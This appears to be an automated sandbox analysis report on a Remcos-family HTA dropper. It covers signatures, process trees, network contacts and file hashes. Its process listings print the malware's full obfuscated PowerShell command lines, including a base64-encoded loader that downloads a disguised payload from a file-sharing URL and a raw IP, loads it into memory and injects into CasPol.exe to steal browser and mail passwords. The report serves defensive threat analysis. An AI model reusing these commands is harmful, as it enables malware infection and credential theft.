Analysis Overview
SHA256
712a8d8a82351dc2d2173b6d66245b1e2ee34db4045fa27b3e76dc462f8a5811
Threat Level: Known bad
The file seethebstpricewithbestthinghappingwithgoodnews.hta was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
NirSoft WebBrowserPassView
Detected Nirsoft tools
NirSoft MailPassView
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:37
Reported
2024-11-11 09:39
Platform
win7-20241023-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta"
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'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'+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s-myyfcs.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC91A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC919.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxsaURbMV0rJFNIZWxsaWRbMTNdKydYJykgKCgoJ3VTemltYWdlVXJsID0nKycgJysnNkZVaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/JysnZicrJ2lsZWtleT0yQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjEnKyc0YmIyMDljNjJjMScrJzczMDknKyc0NTE3NmEwOTA0ZiA2RlU7dVN6d2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZScrJ20uTmV0LldlYkNsaWVudCcrJzt1U3ppbWFnZUJ5JysndGVzID0gdVN6d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh1U3ppbWFnZVVybCk7dVN6aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbScrJy5UZXh0LicrJ0VuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodVN6aW1hJysnZ2VCeXRlcyk7dVN6c3RhcnRGbGFnID0gNkZVPDxCQVNFNjRfU1RBUlQ+PjZGVTt1U3plJysnbmQnKydGbCcrJ2FnID0gNkZVPDxCQVNFNjRfRU5EPj42RlU7dVN6c3RhcnRJbmRleCA9IHVTemltYWdlVGV4dC5JbmRleE9mKHVTenN0YXJ0RmxhZyk7dVN6ZW5kSW5kZXggPSB1U3ppbWFnZVRleHQuSW5kZXhPZih1U3plbmRGbGFnKTt1U3onKydzdGFydEluZGV4IC1nZSAwIC1hbmQgdVN6JysnZW5kSW5kZXggLWd0IHVTenN0YXJ0JysnSW4nKydkZXg7dVN6c3RhcnRJbmRleCArPSB1U3pzdGFydEZsYWcuTGVuZ3RoO3VTemJhc2U2NExlbmd0aCA9IHVTeicrJ2VuZEluZGV4IC0gdVN6c3RhcnRJbmRleDt1U3piYXNlNjRDb21tYW5kID0gdVN6aW1hJysnZ2VUZXh0LlN1YnN0cmluZyh1U3pzdGFydEluZGV4LCB1U3piYXNlNjRMZW5ndGgpO3VTemJhc2U2NFJldmVyJysnc2VkID0gLWpvaW4gKHVTemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBhUXAgRm9yRWFjaC1PYmplY3QgeyB1U3pfIH0nKycpWy0xLi4tKHVTemJhc2U2NENvbW1hbicrJ2QuTGVuZ3RoKV07dVN6Y29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh1U3piYXNlNjRSZXZlcnNlZCk7JysndVN6bG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHVTemMnKydvbW1hbmRCeXRlcyk7dVN6dmFpTWV0JysnaG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGhvZCg2JysnRlVWQUk2RlUpO3VTenZhaU1ldGhvZC5JbnZva2UodVN6bnVsbCwgQCg2JysnRlV0eHQuU0RPR1RIVy8wNTMvODMxLjE3MS40OS4zMi8vOnB0dGg2RicrJ1UsIDZGVScrJ2Rlc2F0aXZhZG82RlUsIDZGVWRlc2F0aXZhZG82RlUsIDZGVWQnKydlc2F0aXZhZG82RlUsIDZGVUNhc1BvbDZGVSwgNkYnKydVZGVzYXRpdmFkbzZGVSwgNkZVJysnZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVMTZGVSw2RlVkZXNhdGl2YWRvNkZVKSk7JykgIC1yZXBsYWNlIChbY0hhcl01NCtbY0hhcl03MCtbY0hhcl04NSksW2NIYXJdMzktcmVwbGFjZSAgKFtjSGFyXTExNytbY0hhcl04MytbY0hhcl0xMjIpLFtjSGFyXTM2IC1DUkVwTEFjZSAgJ2FRcCcsW2NIYXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
Network
| Country | Destination | Domain | Proto |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 877b8b09f9aa4dfaed53349f7f3ab189 |
| SHA1 | c1f52b500201a18c8e01c717c91a5f453bc0c221 |
| SHA256 | c454d2d4834346dda2a9c446d0ea1d7119214af85259f2f2faea7b09181137cc |
| SHA512 | 41bc366ba39e7d348a6752de69feb89c0ff7400304c382cd6a8053791493fe4d04d96c4353e560d2143075d16f38f0492d1125edd250b0af986620bbd1c9a7b6 |
\??\c:\Users\Admin\AppData\Local\Temp\s-myyfcs.cmdline
| MD5 | 731d1450c89b97e35b0b5867de3c69da |
| SHA1 | 5d663061e5a15b56c610c9d33d163197a955a86a |
| SHA256 | 5d31d820f31f921a1270812529b4bda56a5edf3e027e0e4aa6587f0ebbe93b33 |
| SHA512 | dca76a6f6fcf4b24cd900ab4da564dc5b168bfcbe5f1a04169b6522303b3dd15b106b4d4221032be7c65d993bcb813702ee77bbd6ce558710630b2ecfddb0c0e |
\??\c:\Users\Admin\AppData\Local\Temp\s-myyfcs.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC919.tmp
| MD5 | 2b68737b5d5d1eca337012f7784c5b4d |
| SHA1 | dfaf7cc57f6636ca8e5e8c79b7b3d7d6aaa24507 |
| SHA256 | ad4d5aedfb689dcb86c93dcb53b1f77cff18105308c061d06870497df94eb111 |
| SHA512 | c6ca07b6fb913c375eae741ca66498ac3ad015340504ca06cd4bbed672f29f513fcaef6ff84c4e055c3417c2f847c1d3ffe70c881667c4f042d82fb043492c87 |
C:\Users\Admin\AppData\Local\Temp\RESC91A.tmp
| MD5 | 489ea33c4e10141c636368afc13ce1a9 |
| SHA1 | a90780f7fb48903fa2657c90cbe0df3772eb35f9 |
| SHA256 | bcd1fc83dc0e2d152f189988d82637d01533465ff9c574ac7c5e0063ba764efe |
| SHA512 | 9be7322d145d965ba64e24647eea0c21c297f46de12635a894785e822aa9438f350c2014980cf6b6caf92ac1acbf95c5965b55ff41e428821c933447df582357 |
C:\Users\Admin\AppData\Local\Temp\s-myyfcs.dll
| MD5 | b6e6236a88a643b3bb666f9facb0a568 |
| SHA1 | 311f9c0d187a98fe090f3c634cf96a326db33f00 |
| SHA256 | 749279688acf603bbab895b66c9026b32ca866a9d18c990ac73fc8a10f521798 |
| SHA512 | f4f758a5063d76f62c4a5e0b749693f1afde519b103406330f878617a030cc30473bb82b0ed5218f928144672eb5b69184e1d1f4c4f768ec97510e0ca6311e51 |
C:\Users\Admin\AppData\Local\Temp\s-myyfcs.pdb
| MD5 | a45e7c021aa8706d0202a0c719f6dee6 |
| SHA1 | 5937f564544dc2e378bfb79722c893ebf09a9ec8 |
| SHA256 | 989ac574be72576f82a1845020be158d75b3668a163987f528b004d7431037cb |
| SHA512 | d424edad2599b9d6d5e86718f708cea9a59a42be097dde21a4dad993cb581f10e852ea88aa1dc1aab178aba67d073f4e386ac099ffe25ae4d45a925219e09151 |
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:37
Reported
2024-11-11 09:39
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2540 set thread context of 1220 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 2356 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 2988 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 3128 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'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'+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8973.tmp" "c:\Users\Admin\AppData\Local\Temp\2cdwynz5\CSCDA64DFACE0DA42CA848DA92076B13078.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nkoydxwzt"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xeuqeqgthchu"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hgzjwaruvkzzyob"
Network
| Country | Destination | Domain | Proto |
